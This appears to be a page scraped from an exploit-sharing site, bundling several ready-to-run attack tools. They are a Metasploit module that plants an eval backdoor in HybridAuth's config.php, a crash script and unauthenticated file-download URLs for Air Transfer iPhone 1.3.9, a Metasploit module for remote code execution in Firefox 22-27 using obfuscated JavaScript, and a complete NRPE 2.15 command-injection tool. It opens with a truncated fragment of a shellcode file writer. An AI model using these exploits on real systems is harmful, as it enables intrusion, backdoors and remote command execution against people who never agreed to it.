PPR = "\x38\xbf\x40\x00"

explo = (head + rell + Nshe + PPR + shellcode + rell1 + head1 + head2)
arch = open ("uploadpref.dat", "w")

arch.write(explo)
arch.close

HybridAuth install.php PHP Code Execution Unknown rwxr-xr-x 0 10:16 AM

Filename HybridAuth install.php PHP Code Execution
Permission rw-r--r--
Author Unknown
Date and Time 10:16 AM
Label
Action
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking # application config.php is overwritten

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HybridAuth install.php PHP Code Execution',
      'Description'    => %q{
          This module exploits a PHP code execution vulnerability in
        HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
        is not removed after installation allowing unauthenticated users to
        write PHP code to the application configuration file 'config.php'.

        Note: This exploit will overwrite the application configuration file
        rendering the application unusable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pichaya Morimoto', # Discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'     =>
        [
          ['EDB', '34273'],
          ['OSVDB','109838']
        ],
      'Arch'           => ARCH_PHP,
      'Platform'       => 'php',
      'Targets'        =>
        [
          # Tested:
          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 4 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
      ], self.class)
  end


  #
  # Check:
  # * install.php exists
  # * config.php is writable
  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
  #
  def check
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
    if !res
      vprint_error "#{peer} - Connection failed"
      return Exploit::CheckCode::Unknown
    elsif res.code == 404
      vprint_error "#{peer} - Could not find install.php"
    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
      vprint_error "#{peer} - #{$1} is not writable"
    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
      vprint_status "#{peer} - Found version: #{version}"
      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
        return Exploit::CheckCode::Vulnerable
      else
        vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable"
      end
    end
    Exploit::CheckCode::Safe
  end

  #
  # Exploit
  #
  def exploit
    # check vuln
    if check != Exploit::CheckCode::Vulnerable
      fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end

    # write backdoor
    print_status "#{peer} - Writing backdoor to config.php"
    payload_param = rand(1000)
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'install.php'),
      'data'   => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
    )
    if !res
      fail_with Failure::Unknown, "#{peer} - Connection failed"
    elsif res.body =~ /Installation completed/
      print_good "#{peer} - Wrote backdoor successfully"
    else
      fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
    end

    # execute payload
    code = Rex::Text.encode_base64(payload.encoded)
    print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'config.php'),
      'data'   => "#{payload_param}=#{code}"
    }, 5)
    if !res
      print_warning "#{peer} - No response"
    elsif res.code == 404
      fail_with Failure::NotFound, "#{peer} - Could not find config.php"
    elsif res.code == 200 || res.code == 500
      print_good "#{peer} - Sent payload successfully"
    end

    # remove backdoor
    print_status "#{peer} - Removing backdoor from config.php"
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'install.php'),
      'data'   => 'OPENID_ADAPTER_STATUS='
    )
    if !res
      print_error "#{peer} - Connection failed"
    elsif res.body =~ /Installation completed/
      print_good "#{peer} - Removed backdoor successfully"
    else
      print_warning "#{peer} - Could not remove payload from config.php"
    end
  end
end

Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities Unknown rwxr-xr-x 0 10:16 AM

Filename Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities
Permission rw-r--r--
Author Unknown
Date and Time 10:16 AM
Label
Action
# Exploit Title: Air Transfer Iphone v1.3.9 -Remote crash, Broken Authentication file download and Memo Access.
# Date: 08/23/2014
# Category: WebApp
# Version: 1.3.9
# Patch/ Fix: Not available
---------------------------------------------------

Disclosure Time line
=======================
[Aug. 19 2014]  Vendor Contacted
[Aug. 19 2014]  Vendor replied
[Aug. 19 2014]  Vendor Informed about vulnerability with POC.(No reply received)
[Aug. 21 2014]  Notified vendor about Public disclosure after 24 hours (No reply received)
[Aug. 23 2014]  Public Disclosure.

--------------------------------------------------------

Product & Service Details:
==========================
Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser.

Features include:
-----------------

* The easiest way to transfer files between PC and iPhone/iPad !
* Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection !



Vulnerability details
=========================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Remote Application Crashing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/python
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host=raw_input("Enter IP : ")
port=8080
def connect():
    try:
        s.connect((str(host),port))
    except socket.error:
        print "Error: couldn't connect"
        sys.exit()
    return "connected to target"
#Crashing the App
def crashing():
    req="GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
    try:
        s.sendall(req)
    except:
        print "Error occured, Couldn't crash App"
        sys.exit()
    return "Application Down, Conection closed"
print connect()
print crashing()
______________________________________________________________________________________________________________________________

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2. Broken Authentication - Memo access & File download.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To download any file simply visit:

http://<IP>:8080/?downloadSingle?id=1

Just by incrementing the value of "id" we can download all the files.

TO view saved memos visit the below link:

http://<IP>:8080/getText?id=0


We can look for all the memos by incrementing the value of "id"

Firefox WebIDL Privileged Javascript Injection Unknown rwxr-xr-x 0 10:16 AM

Filename Firefox WebIDL Privileged Javascript Injection
Permission rw-r--r--
Author Unknown
Date and Time 10:16 AM
Label
Action
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/exploitation/jsobfu'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  autopwn_info({
    :ua_name    => HttpClients::FF,
    :ua_maxver  => "22.0",
    :ua_maxver  => "27.0",
    :javascript => true,
    :rank       => ExcellentRanking
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox WebIDL Privileged Javascript Injection',
      'Description'    => %q{
        This exploit gains remote code execution on Firefox 22-27 by abusing two
        separate privilege escalation vulnerabilities in Firefox's Javascript
        APIs.
      },
      'License' => MSF_LICENSE,
      'Author'  => [
        'Marius Mlynski', # discovery and pwn2own exploit
        'joev' # metasploit module
      ],
      'DisclosureDate' => "Mar 17 2014",
      'References' => [
        ['CVE', '2014-1510'], # open chrome:// url in iframe
        ['CVE', '2014-1511']  # bypass popup blocker to load bare ChromeWindow
      ],
      'Targets' => [
        [
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch' => ARCH_FIREFOX
          }
        ],
        [
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch'     => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(22, 27) }
      }
    ))

    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
    ], self.class)
  end

  def on_request_exploit(cli, request, target_info)
    send_response_html(cli, generate_html(target_info))
  end

  def generate_html(target_info)
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    frame = Rex::Text.rand_text_alpha(5 + rand(12))
    r = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
    data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
               "{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
               "'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"

    js = Rex::Exploitation::JSObfu.new(%Q|
      var opts = #{JSON.unparse(opts)};
      var key = opts['#{key}'];

      // Load the chrome-privileged browser XUL script into an iframe
      var c = new mozRTCPeerConnection;
      c.createOffer(function(){},function(){
        window.open('chrome://browser/content/browser.xul', '#{frame}');
        step1();
      });

      // Inject a data: URI into an internal frame inside of the browser
      // XUL script to pop open a new window with the chrome flag to prevent
      // the new window from being wrapped with browser XUL;
      function step1() {
        var clear = setInterval(function(){

          // throws until frames[0].frames[2] is available (when chrome:// iframe loads)
          frames[0].frames[2].location;

          // we base64 this to avoid the script tag screwing up things when obfuscated
          frames[0].frames[2].location=window.atob('#{Rex::Text.encode_base64(data_uri)}');
          clearInterval(clear);
          setTimeout(step2, 100);
        },10);
      }

      // Step 2: load the chrome-level window up with a data URI, which
      // gives us same-origin. Make sure to load an "<iframe mozBrowser>"
      // into the frame, since that will respond to our messageManager
      // (this is important later)
      function step2() {
        var clear = setInterval(function(){
          top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
                             'src="about:blank"></iframe></body></html>';
          clearInterval(clear);
          setTimeout(step3, 100);
        }, 10);
      }

      function step3() {
        var clear = setInterval(function(){
          if (!frames[0]) return; // will throw until the frame is accessible
          top.vvv.messageManager.loadFrameScript('data:,'+key, false);
          clearInterval(clear);
          setTimeout(function(){top.vvv.close();}, 100);
        }, 10);
      }

    |)

    js.obfuscate

    %Q|
      <!doctype html>
      <html>
        <body>
          <iframe id='#{frame}' name='#{frame}'
                  style='position:absolute;left:-9999999px;height:1px;width:1px;'>
          </iframe>
          <script>
            #{js}
          </script>
          #{datastore['CONTENT']}
        </body>
      </html>
    |
  end
end

NRPE 2.15 - Remote Code Execution Vulnerability Unknown rwxr-xr-x 0 10:15 AM

Filename NRPE 2.15 - Remote Code Execution Vulnerability
Permission rw-r--r--
Author Unknown
Date and Time 10:15 AM
Label
Action
#!/usr/bin/python
#
#
# Exploit Title : NRPE <= 2.15 Remote Code Execution Vulnerability
#
# Discovered by  : Dawid Golunski
# C crc32 function ripped from check_nrpe_clone by Alan Brenner <alan.brenner@ithaka.org>
#                                       http://www.abcompcons.com/files/nrpe_client.py
#
# pyOpenSSL Library required (http://pyopenssl.sourceforge.net/)
#
# [root@localhost ~]# pip-python install pyOpenSSL
#
# NRPE <= 2.15 Remote Command Execution Vulnerability
# Release date: 17.04.2014
# Discovered by: Dawid Golunski
# Severity: High
# CVE-2014-2913
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913
# http://www.exploit-db.com/exploits/32925/
# http://www.homelab.it/index.php/2014/05/03/nagios-nrpe-remote-command-injection-test-fix/ (ITA)
#
# Tested on CentOS 5.x, CentOS 6.x, BacBox 3.x, KaliLinux 1.0.6 with Python 2.x
#
# Demo: https://www.youtube.com/watch?v=nmYiBdnWWcE
#

import OpenSSL # non-standard, see http://pyopenssl.sourceforge.net/
import optparse
import os
import signal
import socket
import struct
import sys
import time

banner = """

$$\   $$\ $$$$$$$\  $$$$$$$\  $$$$$$$$\        $$$$$$\        $$\  $$$$$$$\\
$$$\  $$ |$$  __$$\ $$  __$$\ $$  _____|      $$  __$$\     $$$$ | $$  ____|
$$$$\ $$ |$$ |  $$ |$$ |  $$ |$$ |            \__/  $$ |    \_$$ | $$ |
$$ $$\$$ |$$$$$$$  |$$$$$$$  |$$$$$\           $$$$$$  |      $$ | $$$$$$$\\
$$ \$$$$ |$$  __$$< $$  ____/ $$  __|         $$  ____/       $$ | \_____$$\\
$$ |\$$$ |$$ |  $$ |$$ |      $$ |            $$ |            $$ | $$\   $$ |
$$ | \$$ |$$ |  $$ |$$ |      $$$$$$$$\       $$$$$$$$\ $$\ $$$$$$\\$$$$$$  |
\__|  \__|\__|  \__|\__|      \________|      \________|\__|\______|\______/



                  $$$$$$$\   $$$$$$\  $$$$$$$$\\
                  $$  __$$\ $$  __$$\ $$  _____|
                  $$ |  $$ |$$ /  \__|$$ |
                  $$$$$$$  |$$ |      $$$$$\\
                  $$  __$$< $$ |      $$  __|
                  $$ |  $$ |$$ |  $$\ $$ |
                  $$ |  $$ |\$$$$$$  |$$$$$$$$\\
                  \__|  \__| \______/ \________|
                                                   NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n


                =============================================
                - Release date: 17.04.2014
                - Discovered by: Dawid Golunski
                - Severity: High
                - CVE: 2014-2913
                =============================================

                                Written by:

                              Claudio Viviani

                           http://www.homelab.it

                              info@homelab.it
                           homelabit@protonmail.ch

                      https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

"""
# Plugin list for Brute force mode
PluginList = ['check_all',
             'check_apt',
             'check_bdii',
             'check_bonding',
             'check_breeze',
             'check_by_ssh',
             'check_check-updates',
             'check_check_sip',
             'check_cluster',
             'check_dhcp',
             'check_dig',
             'check_disk',
             'check_disk_smb',
             'check_dns',
             'check_dpm-disk',
             'check_dpm-head',
             'check_dummy',
             'check_file_age',
             'check_flexlm',
             'check_fping',
             'check_game',
             'check_hpjd',
             'check_http',
             'check_icmp',
             'check_ide_smart',
             'check_ifoperstatus',
             'check_ifstatus',
             'check_ircd',
             'check_lcgdm',
             'check_lcgdm-common',
             'check_ldap',
             'check_lfc',
             'check_linux_raid',
             'check_load',
             'check_log',
             'check_mailq',
             'check_mrtg',
             'check_mrtgtraf',
             'check_mysql',
             'check_nagios',
             'check_nrpe',
             'check_nt',
             'check_ntp',
             'check_nwstat',
             'check_openmanage',
             'check_oracle',
             'check_overcr',
             'check_perl',
             'check_pgsql',
             'check_ping',
             'check_procs',
             'check_radius',
             'check_real',
             'check_rhev',
             'check_rpc',
             'check_sensors',
             'check_smtp',
             'check_snmp',
             'check_ssh',
             'check_swap',
             'check_tcp',
             'check_time',
             'check_ups',
             'check_users',
             'check_wave']



# nrpe 2.15 skip chars "|`&><'\"\\[]{};" and "$()" but not "\x0a"(new line)
evilchar = "\x0a"

QUERY_PACKET    = 1
RESPONSE_PACKET = 2

NRPE_PACKET_VERSION_2 = 2

# max amount of data we'll send in one query/response
MAX_PACKETBUFFER_LENGTH = 1024


#def debug(sMessage):
#    """Send a string to STDERR"""
#    if DEBUG:
#        sys.stderr.write("%s\n" % sMessage)

class DataPacket:
    """A Python implementation of the C struct, packet."""
    def __init__(self, packet_version, packet_type):
        self.nPacketVersion = packet_version # int16
        self.nPacketType = packet_type # int16
        self.nCRC32 = 0 # u_int32
        self.nResultCode = 2324 # int16
        self.sData = ''
        self.tCRC32 = (
             0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,
             0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,
             0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,
             0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
             0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,
             0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
             0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,
             0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
             0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,
             0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,
             0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,
             0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
             0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,
             0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,
             0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,
             0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
             0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,
             0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
             0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,
             0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
             0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,
             0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,
             0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,
             0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
             0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,
             0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,
             0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,
             0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
             0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,
             0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
             0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,
             0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
             0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,
             0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,
             0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,
             0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
             0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,
             0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,
             0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,
             0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
             0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,
             0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
             0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,
             0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
             0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,
             0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,
             0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,
             0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
             0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,
             0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,
             0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,
             0x2d02ef8d)

    def __str__(self):
        # Turn whatever string data we have into a null terminated string
        if len(self.sData) < MAX_PACKETBUFFER_LENGTH:
            sData = self.sData + "\0" * (MAX_PACKETBUFFER_LENGTH - len(self.sData))
            sData += "SR" # not sure about this, from perl
        elif len(self.sData) == MAX_PACKETBUFFER_LENGTH + 2:
            sData = self.sData
        else:
            raise ValueError("CHECK_NRPE: invalid input")
        # Return a string that equals the C struct, not something printable
        return struct.pack("!hhLh" + str(len(sData)) + "s", self.nPacketVersion,
            self.nPacketType, self.nCRC32, self.nResultCode, sData)

    def __len__(self):
        return len(self.__str__())

    def dumpself(self):
        """Debugging output for self as C structure.

        Not normally used."""
        sElf = self.__str__()
        sPrev = sElf[0:1]
        nCount = 0
        ii = -1
        for sChar in sElf[1:]:
            ii += 1
            if sChar == sPrev:
                nCount += 1
                continue
            if nCount:
                print "%d\t%d *" % (ii - nCount, nCount + 1),
                nCount = 0
            else:
                print "%d\t" % ii,
            print "\t'%s' (%d)" % (sPrev, ord(sPrev))
            sPrev = sChar
        print "%d\t\t'%s' (%d)" % (ii + 1, sPrev, ord(sPrev))

    def calculate_crc32(self):
        """Calculate the CRC32 value for the string version of self."""
        nCRC = 0xFFFFFFFF
        for ii in self.__str__():
            nIndex = (nCRC ^ ord(ii)) & 0xFF
            nCRC = ((nCRC >> 8) & 0x00FFFFFF) ^ self.tCRC32[nIndex]
        self.nCRC32 = nCRC ^ 0xFFFFFFFF
        #debug("DataPacket.calculate_crc32 = %d" % self.nCRC32)

    def extract(self, sQuery):
        """Turn a string into the DataPacket attributes."""
        #debug("DataPacket.extract(%d)" % len(sQuery))
        tVals = struct.unpack("!hhLh" + str(len(sQuery) - 10) + "s", sQuery)
        self.nPacketVersion = tVals[0]
        self.nPacketType = tVals[1]
        self.nCRC32 = tVals[2]
        self.nResultCode = tVals[3]
        self.sData = tVals[4]

m_nTimeout = 0
def alarm_handler(nSignum, oFrame):
    """Timeout catcher"""
    raise KeyboardInterrupt("CHECK_NRPE: Socket timeout after %d seconds." %
        m_nTimeout)


class NrpeClient(DataPacket):
    """Everything needed to send a message to an NRPE server and get data back.
    """
    def __init__(self, server_name, server_port=5666, use_ssl=True, timeout=10,
                 packet_version=NRPE_PACKET_VERSION_2):
        DataPacket.__init__(self, packet_version, QUERY_PACKET)
        self.sServer = server_name
        self.nPort = server_port
        self.bUseSSL = use_ssl
        self.nTimeout = timeout

    def run_query(self, sQuery):
        """Connect to the NRPE server, send the query and get back data.
        """
        # initialize alarm signal handling and set timeout
        signal.signal(signal.SIGALRM, alarm_handler)
        signal.alarm(self.nTimeout)

        # try to connect to the host at the given port number
        oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # do SSL handshake
        if self.bUseSSL:
            oContext = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
            oContext.set_cipher_list('ADH')
            oConnection = OpenSSL.SSL.Connection(oContext, oSocket)
        else:
            oConnection = oSocket

        oConnection.connect((self.sServer, self.nPort))

        # we're connected and ready to go
        self.sData = sQuery
        self.nCRC32 = 0
        self.calculate_crc32()

        # send the packet
        oConnection.send(str(self))

        # wait for the response packet
        sRval = oConnection.recv(len(self))

        # close the connection
        if self.bUseSSL and not oConnection.shutdown():
            try:
                sRval += oConnection.recv(len(self))
            except OpenSSL.SSL.ZeroReturnError:
                pass
        oSocket.close()
        del oSocket, oConnection
        if self.bUseSSL:
            del oContext

        # reset timeout
        signal.alarm(0)

        if len(sRval) == 0:
            raise IOError("CHECK_NRPE: Received 0 bytes from daemon." +
                "Check the remote server logs for error messages.")
        elif len(sRval) < len(self):
            raise IOError("CHECK_NRPE: Receive underflow - only " +
                "%d bytes received (%d expected)." % (len(sRval), len(self)))

        # Become the received data
        self.extract(sRval)

        # check the crc 32 value
        nRvalCRC = self.nCRC32
        self.nCRC32 = 0
        self.calculate_crc32()
        if nRvalCRC != self.nCRC32:
            raise ValueError("CHECK_NRPE: Response packet had invalid CRC32.")

        # check packet version
        if self.nPacketVersion != NRPE_PACKET_VERSION_2:
            raise ValueError("CHECK_NRPE: Invalid packet version received from server.")

        # check packet type
        if self.nPacketType != RESPONSE_PACKET:
            raise ValueError("CHECK_NRPE: Invalid packet type received from server.")

        # Turn the input data into a proper python string (chop at first NULL)
        for ii in range(len(self.sData)):
            if self.sData[ii] == "\0":
                break
        self.sData = self.sData[0:ii]


if __name__ == '__main__':
    m_oOpts = optparse.OptionParser("%prog -H Host_or_IP -c nrpe_command --cmd=\"command to execute\" [-b, --brute] [-n] [-p PORT] [--timeout sec] [--list]")
    m_oOpts.add_option('--host', '-H', action='store', type='string',
        help='The address of the host running the NRPE daemon (required)')
    m_oOpts.add_option('--ssl', '-n', action='store_false', default=True,
        help='Do no use SSL')
    m_oOpts.add_option('--port', '-p', action='store', type='int', default=5666,
        help='The port on which the daemon is running (default=5666)')
    m_oOpts.add_option('--timeout', '-t', action='store', type='int',
        default=10,
        help='Number of seconds before connection times out (default=10)')
    m_oOpts.add_option('--command', '-c', action='store', type='string',
        #default='get_data',
        help='The name of nrpe command')
    m_oOpts.add_option('--brute', '-b', action='store_true', default=False,
        help='Find existing nrpe command from list [ -list ]')
    m_oOpts.add_option('--list', action='store_true',  default=False,
        help='Show NRPE Command list')
    m_oOpts.add_option('--cmd', action='store', type='string',
        help='Command to execute on the remote server')

    m_oOptions, m_lArgs = m_oOpts.parse_args()
    m_nTimeout = m_oOptions.timeout
    m_sQuery = m_oOptions.command
    m_gList = m_oOptions.list
    m_sBrute = m_oOptions.brute

    print (banner)

    if m_gList:
        print('[+] NRPE Command list\n')
        for LinesPluginList in PluginList:
            print(LinesPluginList)
        sys.exit(0)
    elif m_sQuery and m_sBrute:
        print m_oOpts.format_help()
        print('[!]')
        print('[!] ERROR: Select only -c OR -b option\n')
        sys.exit(0)
    elif not m_oOptions.host or not m_oOptions.cmd:
        print m_oOpts.format_help()
        sys.exit(0)

    print('[+] Target: '+m_oOptions.host)
    print('[+] Command: '+m_oOptions.cmd+' \n')

    if m_sBrute:
        print('[+] Brute force Mode....')
        print('[+]')
        for LinesPluginList in PluginList:

                m_CommandQuery = ""
                m_CommandQuery += ' ' + m_oOptions.cmd
                if m_lArgs:
                        m_CommandQuery += ' ' + ' '.join(m_lArgs)

                m_sQuery = LinesPluginList+'!'+str(evilchar)+str(m_CommandQuery)+' #'


                m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
                        m_oOptions.timeout)
                try:
                        m_oNRPE.run_query(m_sQuery)
                except socket.error:
                        print('[!] Connection Error!')
                        sys.exit(1)
                except OpenSSL.SSL.ZeroReturnError:
                        print('[!] Not Vulnerable')
                        print('[!] Option dont_blame_nrpe disabled or service fixed')
                        sys.exit(1)

                if m_oNRPE.sData[-11:] == "not defined":
                        print('[-] Checking for NRPE command '+LinesPluginList+':\t\t\tnot found')
                else:
                        print('[+] Checking for NRPE command '+LinesPluginList+':\t\t\tVULNERABLE!')
                        print('[+]')
                        print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
                        print('[+]')
                        print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
                        print('[+]')
                        print(m_oNRPE.sData)
                        sys.exit(0)
    elif m_sQuery:
        print('[+] Custom command Mode....')
        print('[+]')
        print('[+] Connecting......')

        m_CommandQuery = ""
        m_CommandQuery += ' ' + m_oOptions.cmd
        if m_lArgs:
                m_CommandQuery += ' ' + ' '.join(m_lArgs)

        m_sQuery = m_sQuery+'!'+str(evilchar)+str(m_CommandQuery)+' #'

        m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
                m_oOptions.timeout)
        try:
               m_oNRPE.run_query(m_sQuery)
        except KeyboardInterrupt:
                print("[!] CHECK_NRPE: Socket timeout after %d seconds." % m_nTimeout)
                sys.exit(1)
        except socket.error:
                print('[!] Connection Error!')
                sys.exit(1)
        except OpenSSL.SSL.ZeroReturnError:
                print('[!] Not Vulnerable')
                print('[!] Option dont_blame_nrpe disabled or service fixed')
                sys.exit(1)

        if m_oNRPE.sData[-11:] == "not defined":
                print('[-] Checking for NRPE command '+m_oOptions.command+': not found...try other NRPE command')
        else:
                print('[+] Checking for NRPE command '+m_oOptions.command+': VULNERABLE!')
                print('[+]')
                print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
                print('[+]')
                print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
                print('[+]')
                print(m_oNRPE.sData)
                sys.exit(0)
 

xDay Exploit By : Anass Ibn El Farouk